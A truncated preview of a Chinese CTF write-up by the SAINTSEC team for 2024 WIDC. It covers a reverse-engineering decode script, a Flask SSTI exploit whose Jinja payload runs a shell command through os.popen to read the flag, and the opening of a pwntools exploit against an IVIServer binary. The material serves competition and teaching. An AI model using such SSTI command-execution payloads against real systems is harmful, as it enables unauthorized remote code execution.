专栏名称: SAINTSEC
SAINTSEC 民间信息安全技术团队,DEFCON GROUP 020发起团队,旗下分SRC、CTF等多个小组,获得众多的CNVD、CNNVD证书和CVE编号,可接APP、WEB、IoT等安全测试、源代码安全审计、渗透测试、安全培训等项目
今天看啥  ›  专栏  ›  SAINTSEC

2024WIDC WriteUp by SAINTSEC

SAINTSEC  · 公众号  ·  · 2024-05-24 19:35
    

文章预览

Day1-嵌入式程序简单逆向 逆向汇编代码得到加密逻辑为逐位将字符的ASCII码值加上3,再与9异或。将题目给的数据解base64后进行如上加密得到flag。 b64_decode_str =  "lx9bma flag =  "" for  a  in  b64_decode_str:     flag += chr((ord(a) +  3 ) ^  9 )  print(flag) #fr5lym6fpilovmtramz4lpkg8f14c7a54c1c9ca4SxbXaCeIQ0k9riqh3RfzE7sThi Day1 -不安全的车企内网 登录时发现用户名会回显,响应头里面发现是flask,ssti,使用一下exp完成攻击 import  requests url =  "http://172.10.0.21:8000/register" payload =  ''' {{lipsum.__globals__['os'].popen('cat ./flag/flag').read()}} ''' print(requests.post(url, data={ "user" : payload}).text) ‍Day1-IVIServer 原题链接: https://7ee1n.github.io/2021/11/07/BSidesAhmedabadCTF2021/ from pwn import * context.log_level= 'debug' context.binary=ELF( './server' ) elf=ELF( './server' ) libc=ELF( './libc-2.31.so' ) SOCKFD = 4 def get(payload):  global p  ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览